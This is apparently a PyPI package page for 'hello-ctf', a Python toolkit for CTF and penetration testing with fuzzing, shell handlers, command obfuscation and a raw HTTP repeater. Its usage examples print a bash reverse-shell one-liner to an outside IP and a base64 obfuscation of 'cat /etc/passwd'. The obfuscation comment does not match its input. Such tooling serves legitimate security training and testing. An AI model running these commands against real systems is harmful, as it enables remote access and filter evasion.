Skip to main content

A professional CTF and penetration testing toolkit

Project description

hello-ctf

A professional CTF and penetration testing toolkit written in Python.

Features

🔥 Fuzzing & Brute-force

  • BurpAsync - Async concurrent fuzzing framework with rich TUI
  • BurpAsyncPool - Multi-worker parallel execution
  • WordlistLoader - High-performance wordlist loader with O(1) random access and checkpoint support

🐚 Shell & Command Execution

  • ReverseShell / BindShell - TCP shell handler with 20+ built-in templates
  • RunCmd - Non-blocking command executor with process group management
  • Obfuscator - 18+ command obfuscation techniques (base64, hex, IFS, etc.)

🌐 HTTP Tools

  • Repeater - Raw HTTP request sender with encoding support (gzip/deflate/brotli/chunked)
  • HttpEcho - Request logging server
  • HttpFile - File download server

🔧 Utilities

  • Local IP Detection - Cross-platform intelligent network interface selection

Installation

# Clone and install with uv
uv sync

# Or install as package
uv pip install -e .

Quick Start

Fuzzing with BurpAsyncPool

import asyncio
from ctf.burp.burp import BurpAsyncPool, Step

async def main():
    # Define your fuzzing steps
    steps = [
        Step("check_path", handler=check_path_handler),
        Step("verify_sqli", handler=verify_sqli_handler),
    ]

    # Run with multiple workers
    pool = BurpAsyncPool(
        payload=wordlist_generator,
        build_runtime=create_session,
        build_state=create_state,
        steps=steps,
        workers=10,
    )

    results = await pool.run()
    print(f"Found {len(results)} results")

asyncio.run(main())

Wordlist Loader

from ctf.burp.wordlist import WordlistLoader

with WordlistLoader("passwords.txt", continue_=True) as wl:
    for word in wl:
        # Resume from checkpoint automatically
        print(word)

TCP Shell

from ctf.shell.tcp_shell import ReverseShell, gen_shell_r_cmd

# Generate reverse shell command
cmd = gen_shell_r_cmd("bash_i", "10.0.0.1", 9000)
print(cmd)  # bash -i >& /dev/tcp/10.0.0.1/9000 0>&1

# Start listener
with ReverseShell(port=9000) as shell:
    shell.sendline("whoami")
    print(shell.output())

Command Obfuscation

from ctf.shell.obf import apply_obf, random_obf

# Single technique
obf_cmd = apply_obf("base64", "cat /etc/passwd")
# echo d2hvYW1p | base64 -d | bash

# Multiple techniques
obf_cmd = apply_obf("cat /etc/passwd", ["base64", "bash_c_ifs1"])

# Random obfuscation
obf_cmd = random_obf("cat /etc/passwd", depth=3)

HTTP Repeater

from ctf.http.repeater import repeater

# Simple request (string format, auto-converts to bytes)
resp = repeater(
    "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n",
    use_ssl=True,
)

print(resp.status_line())
print(resp.headers())
print(resp.body_text())

# With custom headers
req = """GET /api HTTP/1.1
Host: target.com


"""
resp = repeater(
    req,
    use_ssl=True,
    verify_ssl=False,
    headers={"Authorization": "Bearer xxx", "X-Custom": "value"},
)

Project Structure

src/ctf/
├── burp/           # Fuzzing framework
│   ├── burp.py     # BurpAsync & BurpAsyncPool
│   └── wordlist.py # WordlistLoader
├── http/           # HTTP tools
│   ├── repeater.py # HTTP client
│   └── server.py   # Echo & file servers
├── shell/          # Shell & command
│   ├── obf.py      # Command obfuscation
│   ├── run_cmd.py  # Command executor
│   └── tcp_shell.py# Reverse/Bind shell
└── utils/          # Utilities
    ├── local_ip.py # IP detection
    └── log.py      # Logging

Requirements

  • Python 3.13+
  • brotli >= 1.2.0
  • brotlipy >= 0.7.0
  • psutil >= 7.2.2
  • rich >= 15.0.0
  • xxhash >= 3.7.0

Development

# Run tests
uv run pytest

# Type check
uv run mypy src/

# Lint
uv run ruff check src/

License

MIT License

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

hello_ctf-0.0.3.tar.gz (44.3 kB view details)

Uploaded Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

hello_ctf-0.0.3-py3-none-any.whl (50.0 kB view details)

Uploaded Python 3

File details

Details for the file hello_ctf-0.0.3.tar.gz.

File metadata

  • Download URL: hello_ctf-0.0.3.tar.gz
  • Upload date:
  • Size: 44.3 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.13.12

File hashes

Hashes for hello_ctf-0.0.3.tar.gz
Algorithm Hash digest
SHA256 2364019e5cd0ac1d1360ba0e1cccf13af2e356752061beb6f0df967571d69662
MD5 603e72adfac9b225b9c6f55ec946e52e
BLAKE2b-256 7377902cd9709412a3ff485e7c11c53b9b1f224d0473b7791e47afe1e36eb436

See more details on using hashes here.

File details

Details for the file hello_ctf-0.0.3-py3-none-any.whl.

File metadata

  • Download URL: hello_ctf-0.0.3-py3-none-any.whl
  • Upload date:
  • Size: 50.0 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.13.12

File hashes

Hashes for hello_ctf-0.0.3-py3-none-any.whl
Algorithm Hash digest
SHA256 3ef815843ad1630116909a1f8eeeb13fe4008c62c42f421de354144840f0d911
MD5 44fb61ce3be52b83c06611aa4051a5d9
BLAKE2b-256 d2eabd7c6190e8ac73dd33060f9bba148e4cc9749db6ca2b6a4f57fd25f6146e

See more details on using hashes here.

Supported by

AWS Cloud computing and Security Sponsor Datadog Monitoring Depot Continuous Integration Fastly CDN Google Download Analytics Pingdom Monitoring Sentry Error logging StatusPage Status page